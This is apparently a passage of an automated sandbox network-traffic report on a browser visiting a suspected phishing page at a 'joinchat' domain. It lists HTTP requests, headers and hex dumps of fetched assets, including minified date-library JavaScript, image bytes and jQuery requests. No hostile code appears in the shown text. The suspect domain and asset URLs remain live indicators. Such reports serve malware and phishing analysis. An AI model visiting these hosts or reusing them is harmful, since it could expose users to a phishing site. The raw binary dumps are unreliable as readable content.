                          Data Ascii: sShort[Vd.test(b)?"format":"standalone"][a.month()]}function ea(a,b,c){var d,e,f,g=a.toLocaleLowerCase();if(!this._monthsParse)for(this._monthsParse=[],this._longMonthsParse=[],this._shortMonthsParse=[],d=0;12>d;++d)f=h([2e3,d]),this._shortMonthsParse[d]=
                          2024-05-27 22:30:16 UTC1369INData Raw: 74 68 73 50 61 72 73 65 5b 64 5d 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 64 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 61 28 61 2c 62 29 7b 76 61 72 20 63 3b 69 66 28 21 61 2e 69 73 56 61 6c 69 64 28 29 29 72 65 74 75 72 6e 20 61 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 69 66 28 2f 5e 5c 64 2b 24 2f 2e 74 65 73 74 28 62 29 29 62 3d 72 28 62 29 3b 65 6c 73 65 20 69 66 28 62 3d 61 2e 6c 6f 63 61 6c 65 44 61 74 61 28 29 2e 6d 6f 6e 74 68 73 50 61 72 73 65 28 62 29 2c 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 62 29 72 65 74 75 72 6e 20 61 3b 72 65 74 75 72 6e 20 63 3d 4d 61 74 68 2e 6d 69 6e 28 61 2e 64 61 74 65 28 29 2c 62 61 28 61 2e 79 65 61 72 28 29 2c 62 29 29 2c 61 2e 5f 64 5b 22 73 65 74 22 2b 28 61 2e 5f 69 73 55
                          Data Ascii: thsParse[d].test(a))return d}}function ga(a,b){var c;if(!a.isValid())return a;if("string"==typeof b)if(/^\d+$/.test(b))b=r(b);else if(b=a.localeData().monthsParse(b),"number"!=typeof b)return a;return c=Math.min(a.date(),ba(a.year(),b)),a._d["set"+(a._isU
                          2024-05-27 22:30:16 UTC1369INData Raw: 22 69 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 61 28 61 29 7b 76 61 72 20 62 2c 63 3d 61 2e 5f 61 3b 72 65 74 75 72 6e 20 63 26 26 2d 32 3d 3d 3d 6a 28 61 29 2e 6f 76 65 72 66 6c 6f 77 26 26 28 62 3d 63 5b 4e 64 5d 3c 30 7c 7c 63 5b 4e 64 5d 3e 31 31 3f 4e 64 3a 63 5b 4f 64 5d 3c 31 7c 7c 63 5b 4f 64 5d 3e 62 61 28 63 5b 4d 64 5d 2c 63 5b 4e 64 5d 29 3f 4f 64 3a 63 5b 50 64 5d 3c 30 7c 7c 63 5b 50 64 5d 3e 32 34 7c 7c 32 34 3d 3d 3d 63 5b 50 64 5d 26 26 28 30 21 3d 3d 63 5b 51 64 5d 7c 7c 30 21 3d 3d 63 5b 52 64 5d 7c 7c 30 21 3d 3d 63 5b 53 64 5d 29 3f 50 64 3a 63 5b 51 64 5d 3c 30 7c 7c 63 5b 51 64 5d 3e 35 39 3f 51 64 3a 63 5b 52 64 5d 3c 30 7c 7c 63 5b 52 64 5d 3e 35 39 3f 52 64 3a 63 5b 53 64 5d 3c 30 7c 7c 63 5b 53 64 5d 3e 39 39 39 3f 53 64 3a 2d 31
                          Data Ascii: "i")}function ma(a){var b,c=a._a;return c&&-2===j(a).overflow&&(b=c[Nd]<0||c[Nd]>11?Nd:c[Od]<1||c[Od]>ba(c[Md],c[Nd])?Od:c[Pd]<0||c[Pd]>24||24===c[Pd]&&(0!==c[Qd]||0!==c[Rd]||0!==c[Sd])?Pd:c[Qd]<0||c[Qd]>59?Qd:c[Rd]<0||c[Rd]>59?Rd:c[Sd]<0||c[Sd]>999?Sd:-1
                          2024-05-27 22:30:16 UTC1369INData Raw: 7c 61 25 34 30 30 3d 3d 3d 30 7d 66 75 6e 63 74 69 6f 6e 20 74 61 28 29 7b 72 65 74 75 72 6e 20 73 61 28 74 68 69 73 2e 79 65 61 72 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 75 61 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 37 2b 62 2d 63 2c 65 3d 28 37 2b 71 61 28 61 2c 30 2c 64 29 2e 67 65 74 55 54 43 44 61 79 28 29 2d 62 29 25 37 3b 72 65 74 75 72 6e 2d 65 2b 64 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 76 61 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 76 61 72 20 66 2c 67 2c 68 3d 28 37 2b 63 2d 64 29 25 37 2c 69 3d 75 61 28 61 2c 64 2c 65 29 2c 6a 3d 31 2b 37 2a 28 62 2d 31 29 2b 68 2b 69 3b 72 65 74 75 72 6e 20 30 3e 3d 6a 3f 28 66 3d 61 2d 31 2c 67 3d 72 61 28 66 29 2b 6a 29 3a 6a 3e 72 61 28 61 29 3f 28 66 3d 61 2b 31 2c 67 3d 6a 2d 72 61 28 61 29 29 3a 28 66 3d 61
                          Data Ascii: |a%400===0}function ta(){return sa(this.year())}function ua(a,b,c){var d=7+b-c,e=(7+qa(a,0,d).getUTCDay()-b)%7;return-e+d-1}function va(a,b,c,d,e){var f,g,h=(7+c-d)%7,i=ua(a,d,e),j=1+7*(b-1)+h+i;return 0>=j?(f=a-1,g=ra(f)+j):j>ra(a)?(f=a+1,g=j-ra(a)):(f=a


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.449756104.21.234.2304435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:15 UTC615OUTGET /AlexHostX/protect/a64076479559076b6e31356a0fb6188d291204ce/watermark.css HTTP/1.1
                          Host: rawcdn.githack.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: text/css,*/*;q=0.1
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: style
                          Referer: https://joinchat8g7135b.12trm.my.id/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:16 UTC944INHTTP/1.1 404 Not Found
                          Date: Mon, 27 May 2024 22:30:16 GMT
                          Content-Length: 14
                          Connection: close
                          X-GitHub-Request-Id: 2CA2:32755B:1C5AE1A:1DEE559:6655089B
                          Via: 1.1 varnish
                          X-Served-By: cache-hel1410033-HEL
                          X-Cache: MISS
                          X-Cache-Hits: 0
                          X-Timer: S1716848796.459330,VS0,VE144
                          Vary: Authorization,Accept-Encoding,Origin
                          Cross-Origin-Resource-Policy: cross-origin
                          X-Fastly-Request-ID: c52ee8936842679537ed606df884e56690f892cd
                          Source-Age: 0
                          Cache-Control: max-age=60, public
                          X-Githack-Cache-Status: HIT
                          CF-Cache-Status: HIT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oUTLFvZiTMRAoK3Q93kizLBJ0hjl6jJKmwAUq%2ByJgtbCAC5MaNw%2BrPwdruGI22QcS0CFWdFYPpq3vlpyyniKdBb5IgK7XY3Bq2JL7ttD8hM0RFcCBZWo9Btb9hnLcuGWqiOI5ug%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972ce2c9219f3-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:16 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                          Data Ascii: 404: Not Found


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.449757185.199.110.1334435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:15 UTC661OUTGET /assets/398893/15136779/4e765036-1639-11e6-9201-67e728e86f39.jpg HTTP/1.1
                          Host: cloud.githubusercontent.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://joinchat8g7135b.12trm.my.id/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:16 UTC594INHTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 224922
                          x-amz-replication-status: COMPLETED
                          Last-Modified: Tue, 10 May 2016 05:56:48 GMT
                          ETag: "f9cebf245b82051cf1e25a5c190de77d"
                          Cache-Control: max-age=2592000
                          x-amz-version-id: null
                          Content-Type: image/jpeg
                          Accept-Ranges: bytes
                          Age: 2297014
                          Date: Mon, 27 May 2024 22:30:16 GMT
                          Via: 1.1 varnish
                          X-Served-By: cache-nyc-kteb1890097-NYC
                          X-Cache: HIT
                          X-Cache-Hits: 0
                          X-Timer: S1716849016.027985,VS0,VE2
                          X-Fastly-Request-ID: 99ce12c6b22fce6247a89fed454aa343593e6a54
                          Server: GitHub Cloud
                          Timing-Allow-Origin: https://github.com
                          2024-05-27 22:30:16 UTC1378INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 2d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                          Data Ascii: ExifII*Duckyd-http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xm
                          2024-05-27 22:30:16 UTC1378INData Raw: 4f 0b aa 6c 48 ce a1 94 84 b2 e1 8f 12 47 25 0d ea 07 25 ee 3e 63 bf 71 d1 5e fb 9d 71 61 ae 6f 11 b0 47 21 0f 2a 79 8a e3 39 12 e5 cf 18 ef e9 d0 69 e5 2a 71 f2 4d 29 c4 e5 79 a2 bf 13 f3 5e 40 e0 f4 04 e8 11 df a5 a7 15 68 9a 28 35 9a da 91 88 bd a5 02 4f 3a 4a 25 69 cd 81 c0 fc ad 80 49 c1 c6 3a 0d 68 3d e9 ae 1a fc cb 79 2a 11 e9 3f 0d 6b 10 ec 25 5a c7 8a 78 9d d3 04 8c 2f cf 03 38 00 31 ed d1 5d b5 da 46 a2 00 ef 66 d7 52 3c 0f b2 d3 69 7d cf 0c 7d 35 f1 bb 03 8c 06 ce 4f 71 9e 83 cf ee 51 46 7c cf 60 c2 55 31 ae d8 98 fb 69 d1 58 23 2b 31 71 42 a8 fd 99 82 94 52 0e 48 c7 44 ca 87 45 06 f0 9e cc 9a 35 04 ab 60 e5 49 57 46 52 19 29 36 1d d2 93 70 0a 91 dc 11 d0 24 2f b5 aa 3c 7b 71 ae d4 87 65 db d6 9f 95 99 7f fc 27 55 3f 55 69 8f 53 35 75 6f 5c 2f
                          Data Ascii: OlHG%%>cq^qaoG!*y9i*qM)y^@h(5O:J%iI:h=y*?k%Zx/81]FfR<i}}5OqQF|`U1iX#+1qBRHDE5`IWFR)6p$/<{qe'U?UiS5uo\/
                          2024-05-27 22:30:16 UTC1378INData Raw: ab af 08 89 5a bc 96 95 55 2c 49 00 a8 c7 7e 5d 05 7d 51 35 d6 d7 59 32 b4 96 12 59 b2 9c ab 22 a2 85 2a 7b 64 10 3a 28 5b 1a 3a db 2f ce aa fc 8a 78 9c ce d6 90 ac b2 5b c5 61 27 41 69 64 9f a5 b2 3b 9f 81 39 06 c0 00 00 00 00 00 00 03 00 01 d8 00 07 a0 1d 02 bb 70 a5 84 9e 2e b3 be bd 7c d1 67 05 a6 c7 83 c9 e7 55 04 31 9d 27 42 3b 77 07 07 e1 8e 80 49 1d bb 5e 16 db f0 49 35 8b bc a3 af 4a 5b 95 9e 6f 13 5a 56 92 86 02 ca 8c 02 85 f5 6c 92 70 3a 0a 1d 07 ba 09 69 b7 42 d6 bb e0 c8 6e ae 94 64 aa 43 2e 36 57 52 95 76 ee 49 7a be 71 80 02 a8 f9 93 d4 e8 6f 5f 55 35 fc 8c 1e 95 ad 4a 9a de c5 5a b4 e2 30 80 f0 54 45 44 04 e1 55 55 46 4f 6e e7 aa 33 bb ae db 31 55 42 81 e7 69 59 16 aa 5a 4e d2 70 e1 2a a3 bf 16 c7 a8 f4 38 3d f1 8e 88 e6 9e bd 20 36 1e a6
                          Data Ascii: ZU,I~]}Q5Y2Y"*{d:([:/x[a'Aid;9p.|gU1'B;wI^I5J[oZVlp:iBndC.6WRvIzqo_U5JZ0TEDUUFOn31UBiYZNp*8= 6
                          2024-05-27 22:30:16 UTC1378INData Raw: c9 b0 49 ed 8e 80 9b 4c 2b b5 a5 ac 98 2e 96 fb ba e3 d6 70 8c e8 aa c7 e4 69 77 55 1f 30 1b e4 7a 0a 3d 14 9d b5 19 eb e7 8e c5 75 ac 66 25 46 9a cd d2 b3 56 66 40 f3 aa 3a f2 99 73 c5 86 08 c9 07 23 b7 40 4d 78 4f 59 3c 4a ec ec cc f5 a3 d1 81 ad 68 ed 97 a3 e0 28 c9 27 1d 80 00 60 00 00 03 a0 63 a0 89 a9 26 f6 fb 4e 5b 12 4a d3 69 8c 97 dc 95 99 ab 7a 2c e9 6e 1b 4b 66 6a c9 99 24 c4 71 66 9e 7b 00 bd 87 44 39 b9 b5 aa 12 da 8d bf af ab b3 48 51 53 9d e6 95 9b 51 19 52 81 19 d5 b2 a4 e4 7e ce 8a ef b7 56 75 d3 81 9a 2c 84 d4 c0 cd 0f 24 9b c1 8c 68 b3 61 90 f3 0e 87 8b 7c 47 7e 83 2d ed e8 db 47 63 cb 40 ad 79 ec bc 31 3e 0d b1 28 8d 74 a7 32 86 aa 04 94 65 41 c1 23 f1 20 90 e5 5f c5 3a 53 83 d3 82 33 89 cd 4b 51 ca 82 42 22 8f 56 6c 60 7e 3d 15 17 4f
                          Data Ascii: IL+.piwU0z=uf%FVf@:s#@MxOY<Jh('`c&N[Jiz,nKfj$qf{D9HQSQR~Vu,$ha|G~-Gc@y1>(t2eA# _:S3KQB"Vl`~=O
                          2024-05-27 22:30:16 UTC1378INData Raw: 4e cd 05 d4 2c ac e3 6d 17 ef 5a 47 04 8e 1a b8 82 39 5f 8e 7b 1f 87 c3 a0 b2 ee 93 52 f4 75 44 51 96 77 60 aa a3 e6 59 88 00 74 52 3f d4 b5 5b fd 21 b1 b0 3d 79 eb ea 6c da 47 f6 59 24 62 d9 cf c1 8f 44 77 fa 8c 47 fa 92 dd 90 f8 97 d1 db 2a 3e 7c 9d 22 e8 a3 f1 27 1d 03 10 da d6 d9 04 eb de 56 c7 e6 13 75 66 5f 86 1d 41 e4 87 f0 20 74 50 6b a8 5e a6 f1 d8 b6 ad 5d 42 54 c8 49 d2 a1 73 c0 bc ed 3a 2f 34 ce 03 0c 1c 76 39 18 c1 05 d7 d7 4d 64 28 85 dc bb b5 6b 5a 10 d4 ad 5f 1c a9 42 02 af 22 00 00 00 00 00 00 00 1d 15 2b de f9 78 e2 48 43 11 e6 27 cb c7 c1 f7 5c 57 ed 4d f9 fe 97 0f cf c7 c9 fa 7e 4e 39 f8 74 4a 5b 51 e3 0d b1 6a 2e f7 89 75 78 c6 96 d3 56 45 a5 68 4d f8 d3 db f5 fe d8 02 92 4e f9 c7 ae 0f af 41 5f fa 9e 87 c7 6a 4a 7e 4e 4a 1f fb ae 14
                          Data Ascii: N,mZG9_{RuDQw`YtR?[!=ylGY$bDwG*>|"'Vuf_A tPk^]BTIs:/4v9Md(kZ_B"+xHC'\WM~N9tJ[Qj.uxVEhMNA_jJ~NJ
                          2024-05-27 22:30:16 UTC1378INData Raw: d0 7d 4e 83 93 ae 24 c8 b3 7d 46 3a 8e 88 49 98 31 55 08 d3 2d 96 f1 bc 8a b0 07 b8 ce 0f 71 d1 46 d9 89 d8 d7 bc 03 99 1b 4a 92 f2 05 0c 53 c8 a5 73 c4 f6 3d 8f e1 fb ba 04 87 f5 6e 24 05 d1 9f 85 14 22 0f 2d 57 6d 86 72 39 93 26 d4 52 00 03 22 84 13 9c 90 3b 90 6d 58 dd 6d b1 b3 b1 e3 47 d8 11 1e 09 12 e9 31 20 c0 33 55 95 1a 94 60 d8 38 0a a0 01 80 7b 92 07 d8 d9 8e aa 2b d9 98 2b 3a cd 42 4e b5 76 76 04 85 59 c5 1d c9 c2 93 e9 d8 0e 8a 9f 7f 76 9f 8e 8f a4 83 70 c6 4f 6b b7 33 28 c2 73 56 76 16 a1 46 2b 66 0b f4 a6 39 7c 4e 07 7e 82 85 a4 bb 5a d5 8d 39 2a 6c 41 e4 f8 38 60 b6 99 46 c1 c7 66 01 ba 04 8e be f5 c4 a3 b5 5d 7f 0c e9 2a 52 91 5a 0a ec 98 51 6b 35 28 df 46 b8 67 40 5f 0c f9 19 03 19 c8 23 7b 1b bc 9c 6a 69 bc e9 b6 d4 f1 b9 1f a8 9a 8a 14
                          Data Ascii: }N$}F:I1U-qFJSs=n$"-Wmr9&R";mXmG1 3U`8{++:BNvvYvpOk3(sVvF+f9|N~Z9*lA8`Ff]*RZQk5(Fg@_#{ji
                          2024-05-27 22:30:16 UTC1378INData Raw: 99 60 be 5e 01 94 a0 72 08 4a 71 72 50 9e c1 c0 cf 41 f3 7a e9 ac d4 8c f6 87 8f 52 7c a5 6a 17 b2 4f 6f 61 59 3c 51 f7 3d 76 6f 1e bd d0 8e 4c 1f 22 8f 82 ac 41 20 91 f6 20 00 00 50 02 80 00 00 00 00 03 00 00 3b 00 07 45 4d de 98 d7 0d ee 51 01 6d ae bc f6 38 f6 1b 3a 89 de d3 a0 03 eb 69 cf 2d 33 82 43 0c 7a 12 09 0f d2 73 bc 9e 74 55 a4 aa 85 59 4f 75 65 61 f3 1f 31 f1 1d 14 90 d5 dc 41 e3 9f b8 bf 8c 76 53 5d 79 57 61 57 e0 3c c4 aa 3e 3e 6c 8c c7 e2 49 ef d1 04 96 84 27 41 77 34 d9 d8 5c f1 be cb f9 1d 33 eb e2 5c 2c 61 9f 8f 8d 57 3d 15 cd e8 d6 9f 6d 59 4d 6c 75 76 45 cc 19 82 79 57 c3 69 7d 2c df 40 a4 cd 43 2f 2e d9 5f 87 62 03 3a 92 af 9f 6b 6a b2 fb 7f b8 10 55 81 64 77 1e 15 a0 35 b1 99 69 f9 69 e4 0b 85 66 01 50 77 e8 82 6e d6 a8 92 9c 08 4b
                          Data Ascii: `^rJqrPAzR|jOoaY<Q=voL"A P;EMQm8:i-3CzstUYOuea1AvS]yWaW<>>lI'Aw4\3\,aW=mYMluvEyWi},@C/._b:kjUdw5iifPwnK
                          2024-05-27 22:30:16 UTC1378INData Raw: d7 b7 3a 6c 79 1e 7a fa f4 f1 bc cc d9 a7 87 bd 7c 75 3f 42 15 2b 9c 96 53 8e 88 6f 4f 42 5a 98 6e 46 b6 13 12 f2 15 54 59 cb 21 bc 30 92 01 38 47 90 07 03 b9 23 2c 58 f7 e8 1e 20 1c 64 03 83 91 91 9c 1f 98 f9 1e 8a 5f 6c ed 88 9f b2 48 3d c9 01 7e e5 dd 24 a0 e7 2c 7c 6a cc d8 f9 76 cf cf a0 f9 ca 46 cb 58 ea ed aa cf 7b 7f 61 a8 bb f1 bd 28 08 f0 a2 ec ac b8 47 4f c4 c9 3d 69 00 8c 1d 48 c3 1e 44 1e a2 3e 8b 4f 52 7a 51 f0 cd ed 40 58 bb 3d ea f6 a3 b9 00 16 66 73 db 21 47 60 00 fc 3a aa 4d 77 6f 4f 73 3a b3 12 3a c8 2a 28 4a 39 af 28 ce 2c ee 28 28 10 2f 97 65 50 2f 02 49 56 ef db a0 26 af 11 bd ee 61 f0 2c d5 83 20 3f 98 ea 0d 58 ac ca e7 b9 98 d8 15 1f 83 67 a2 29 74 56 59 95 14 bb b2 a2 28 cb 33 10 aa a3 e6 58 e0 01 d0 4e 9b fd f6 d4 af 30 4e a6 a8
                          Data Ascii: :lyz|u?B+SoOBZnFTY!08G#,X d_lH=~$,|jvFX{a(GO=iHD>ORzQ@X=fs!G`:MwoOs::*(J9(,((/eP/IV&a, ?Xg)tVY(3XN0N
                          2024-05-27 22:30:16 UTC1378INData Raw: 8e 3c b6 8d 97 c5 b7 04 cf d6 58 12 00 cf 1f 94 30 b1 a7 7a 59 28 96 0a bb 1a f5 6d 7b 84 c8 42 ea a9 45 a2 03 92 12 d2 a2 b8 07 38 e5 8c 9c 75 54 38 77 f7 1d f6 5f ca 23 a3 26 f9 79 97 ee aa f9 fe f7 86 f3 fd d8 e8 30 be e2 8d ba 74 fc 4c 3f 55 e0 29 cd 32 6a 9a e3 65 b3 1c f9 16 5e 33 80 e7 b1 6e df 10 48 1b 67 55 a8 eb b1 af 41 1d a9 a9 45 76 5e 72 ac f3 c8 c3 62 60 a9 79 96 ee 08 21 94 f7 07 b9 04 27 54 ea b5 0b 7b 9c 6b a6 ee ab 3a ba ec 58 7b 76 ca a1 3c 05 2d 26 9c 8a fd 58 c5 95 09 1d b0 47 44 33 38 5f 5b 3f d3 ce ad 75 1c 9a 4f 5a 8c f1 48 97 ee c3 5e f1 4b aa c1 9b b8 4f 19 00 93 83 8e c0 09 e1 f7 0a 65 df 71 35 db f8 63 af 14 ac 40 ff 00 d6 d2 eb e6 b1 3f 35 f1 0f c3 e3 d0 61 e1 bb 6f 1a 6c d7 53 c1 3b 46 f4 69 4e a8 f4 3a f4 5b cc 71 7a ba c9
                          Data Ascii: <X0zY(m{BE8uT8w_#&y0tL?U)2je^3nHgUAEv^rb`y!'T{k:X{v<-&XGD38_[?uOZH^KOeq5c@?5aolS;FiN:[qz
                          2024-05-27 22:30:16 UTC1378INData Raw: 28 ab 70 95 da 6f 0f 1f ba de 76 d9 c3 aa b2 3f ea 3d b3 f4 a7 15 e4 07 c0 e0 8a dd 14 2b da 7a f1 a5 ea 71 39 a9 66 c0 c9 38 f4 55 1e ac ec 7b 01 ea 49 c7 40 ae 96 cd ec d6 96 d4 92 36 90 8d 02 21 2c 04 76 10 b2 06 27 d5 d1 d1 d0 91 d8 95 ed d1 0f f4 54 bd 0a 6f bd 2c 36 d1 82 05 04 16 9c e6 16 c6 94 0d 38 14 77 35 80 98 52 19 bb e4 fe 38 04 6f 6f 76 32 76 d7 a4 6b 54 32 46 d8 64 f1 f0 8c 76 28 da e8 d4 0d 44 a3 87 75 39 08 18 80 09 f9 64 30 3d be c5 67 0a ee b5 75 26 d3 2b 33 15 5b d1 64 c1 a7 3b ec 73 22 88 0a 8c e1 15 9b 1d c9 c9 e8 28 f9 13 98 97 34 f2 14 34 13 e4 39 94 52 14 b8 4c f2 28 19 80 27 d3 27 a2 83 b5 1d 7a cf 96 ca e5 23 ca a1 c3 3a 3c f8 a3 72 65 79 32 d0 7d 19 c8 07 b8 e8 14 8d ec 23 35 d4 f6 ca 24 02 2f 88 52 da d1 1e 3c 0e 04 22 52 ce
                          Data Ascii: (pov?=+zq9f8U{I@6!,v'To,68w5R8oov2vkT2Fdv(Du9d0=gu&+3[d;s"(449RL(''z#:<rey2}#5$/R<"R


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.449755104.21.234.2304435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:15 UTC678OUTGET /AlexHostX/all.asset/c529c239acac01cd8bc1a76f349f7c3caebba766/580b57fcd9996e24bc43c543.png HTTP/1.1
                          Host: rawcdn.githack.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://joinchat8g7135b.12trm.my.id/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:16 UTC793INHTTP/1.1 301 Moved Permanently
                          Date: Mon, 27 May 2024 22:30:16 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: close
                          Location: https://raw.githubusercontent.com/AlexHostX/all.asset/c529c239acac01cd8bc1a76f349f7c3caebba766/580b57fcd9996e24bc43c543.png
                          Cache-Control: max-age=86400, public
                          Access-Control-Allow-Origin: *
                          CF-Cache-Status: HIT
                          Age: 39320
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rrFtGoiDirdib9E8iDGOdE%2FuLY0Vk59LnBtdqzQtFhjaSNnpJVglPSSZQaQDZa5TR4f2Cq3dB4xkmvQKljLEVw%2BCIvARs5WwBNxK1zBHQ%2Bf2mxRuHzA3HgYTgx1CFTwS%2FO602vk%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972ce29957cac-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:16 UTC197INData Raw: 62 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                          Data Ascii: bf<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.13.6.2</center></body></html>
                          2024-05-27 22:30:16 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.449749184.28.90.27443
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:16 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-05-27 22:30:16 UTC467INHTTP/1.1 200 OK
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          Content-Type: application/octet-stream
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          Server: ECAcc (lpl/EF06)
                          X-CID: 11
                          X-Ms-ApiVersion: Distribute 1.2
                          X-Ms-Region: prod-weu-z1
                          Cache-Control: public, max-age=149938
                          Date: Mon, 27 May 2024 22:30:16 GMT
                          Connection: close
                          X-CID: 2


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.449758188.114.96.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:16 UTC586OUTGET /vhsfhqpdhdsih6/img/jquery.min.js HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
